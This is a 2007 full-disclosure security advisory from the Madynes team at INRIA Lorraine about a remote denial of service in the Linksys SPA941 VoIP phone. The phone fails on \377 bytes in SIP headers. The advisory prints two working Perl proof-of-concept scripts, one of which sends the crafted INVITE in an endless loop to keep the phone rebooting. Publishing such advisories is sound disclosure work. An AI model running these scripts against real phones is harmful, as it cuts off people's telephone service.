SecurityvulnsSECURITYVULNS:DOC:16837[Full-disclosure] Linksys SPA941 remote DOS with \377 character
MADYNES Security Advisory
<http://madynes.loria.fr/> http://madynes.loria.fr
Title: Linksys SPA941 remote DOS with \377 character
Discovery Date: 01/02/2007
Vendor notification: 4/04/2007 and 17/04/2007
Release Date: 24/04/2007
Severity:
Moderate - Denial of Service
Advisory ID:KIHP3
Vulnerability in Linksys SPA941
Synopsis: After sending a crafted SIP messages the device immediately
reboots. The phone does not check properly the metacharacters \377 in the
SIP field.
The vendor was informed and future firmware will be available. This
vulnerability was identified by the Madynes research team at INRIA Lorraine,
using the Madynes VoIP fuzzer.
Background: SIP is the IETF standardized (RFCs 2543 and 3261) protocol for
VoIP signalization. SIP is an ASCII based INVITE message is used to initiate
and maintain a communication session.
Configuration of our device:
-
Software Version:5.1.5 -
IP-Address obtained by DHCP as 192.168.1.107 -
User Name: linksys
Vulnerability:
It may reboot and/or replies with invalid messages. The phone is not able to
handle well the character \377 (full byte) in a message. Depending where
this character is located the phone may reboot (e.g. in any section of the
FROM header). If this character is located anywhere else it may modify the
content of the reply messages generated by the phone as showed in the
exploit. It looks like a format string vulnerability, but no effort to
investigate firmware was done.
Exploit 1)
In this exploit we set a \377 character before every carriage return. The
Replies are modified in their Status line and most of the headers are
erased. Different behavior exists depending in the quantity of \377
characters and their location. Linksys IP Phone SPA941 (firmware 5.1.5), can
not cope with the \337 characters in the FROM field when the real (IP port
in the IP packet) is different from the IP port in the SIP-FROM field .
Exploit 1)
To run the exploit the file linksys-5.1.5.pl should be launched (assuming
our configurations) as:
perl linksys-5.1.5.pl 192.168.1.107 5060 linksys
POC: 1
#!/usr/bin/perl
use IO::Socket::INET;
die "Usage $0 <dst> <port> <username>" unless ($ARGV[2]);
$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],
Proto=>'udp',
PeerAddr=>$ARGV[0]);
$msg =
"INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\377\r
Via: SIP/2.0/UDP 192.168.1.2;rport;branch=00\377\r
Max-Forwards: 70\377\r
To: lynksys <sip:$ARGV[2]\@$ARGV[0]>\377\r
From: <sip:tucuman\@192.168.1.2>;tag=00\377\r
Call-ID: tucu\@192.168.1.2\377\r
CSeq: 24865 INVITE\377\r
Contact: <sip:tucu\@192.168.1.2>\377\r
Supported: 100rel\377\r
Content-Length: 0\377\r
\r\n";
$socket->send($msg);
Exploit 2)
In order to remote reboot the phone the following PC will work
If the phone is called with the POC 2 it will ring. When answering it
reboots immediately. If not it will reboot after some time.
The POC will send the killer message every 90 seconds -the time needed for a
reboot and performs the effective DOS. It also opens a socket on the local
machine to avoid sending RST to the phone. The same can be obtained with a
firewall or a netcat.
POC 2:
Command: perl script.pl <username> <dst_IP> <SourceIp> <sourceport>
Eg. Perl script.pl 101 152.81.114.195 152.81.12.93 5060
Script Code:
#!/usr/bin/perl
use IO::Socket;
#die "Usage $0 <username> <dst_IP> <Source_IP> <SourcePort>" unless
($ARGV[2]);
die "Usage $0 <username> <dst_IP> <SourceIp> <sourceport>" unless
($ARGV[0]);
my $sock = new IO::Socket::INET( LocalHost => $ARGV[2], LocalPort =>
$ARGV[3], Proto => 'udp');
$socket=new IO::Socket::INET->new(PeerAddr=>$ARGV[1], PeerPort=> '5060',
Proto=>'udp', LocalAddr=>$ARGV[2], LocalPort=>'5061');
$touser=$ARGV[0];
$target=$ARGV[1];
$sourceaddress=$ARGV[2];
$sourceport=$ARGV[3];
$high=2000;
$low=1;
$fromuserid = int(rand( $high-$low+1 ) ) + $low;
my $cseq = "INVITE";
$msg = "INVITE sip:$touser\@$target SIP/2.0\r
Via: SIP/2.0/UDP $sourceaddress:$sourceport;branch=z9hG4bK00000\r
From: \377<sip:$fromuserid\@$sourceaddress>;tag=779\r
To: Receiver <sip:$touser\@$target>\r
Call-ID: 10\@$sourceaddress\r
CSeq: 1 $cseq\r
Contact: 779 <sip:$fromuserid\@$sourceaddress>\r
Expires: 1200\r
Max-Forwards: 70\r
Content-Type: application/sdp\r
Content-Length: 133\r
\r
v=0\r
o=0 0 0 IN IP4 $sourceaddress\r
s=Session SDP\r
c=IN IP4 $sourceaddress\r
t=0 0\r
m=audio 9876 RTP/AVP 0\r
a=rtpmap:0 PCMU/8000\r";
$sock or die "no socket :$!";
while (1){
$socket->send($msg);
sleep 90;
}
Impact:
A malicious user can remotely crash and perform a denial of service attack
by sending one crafted SIP messages. This is conceptually similar to the
"ping of death".
Resolution:
Fixed software will be available and following recommended best practices
(ie segregating VOIP traffic from data) will be protected from malicious
traffic in most situations.
>From Linksys response we include the following resolution: This style of
attack, limited to a single end point and executed from behind a secure
firewall, should not affect an entire network and in most cases should
easily be contained by the local network management entity. Linksys will
directly address this issue with a future release of the phone firmware.
Distribution: The advisory will be posted on the following websites:
The advisory will be posted to the following mailing lists
Voipsec : [email protected].
fulldisclosure: [email protected]
Credits:
Balamurugan Karpagavinayagam (Software engineer)
Humberto J. Abdelnur (Ph.D Student)
Radu State (Ph.D)
Olivier Festor (Ph.D)
This vulnerability was identified by the Madynes research team at INRIA
Lorraine, using the Madynes VoIP fuzzer.
Information about us: Madynes is a research team at INRIA Lorraine working
on VoIP Security assessment, intrusion detection and prevention.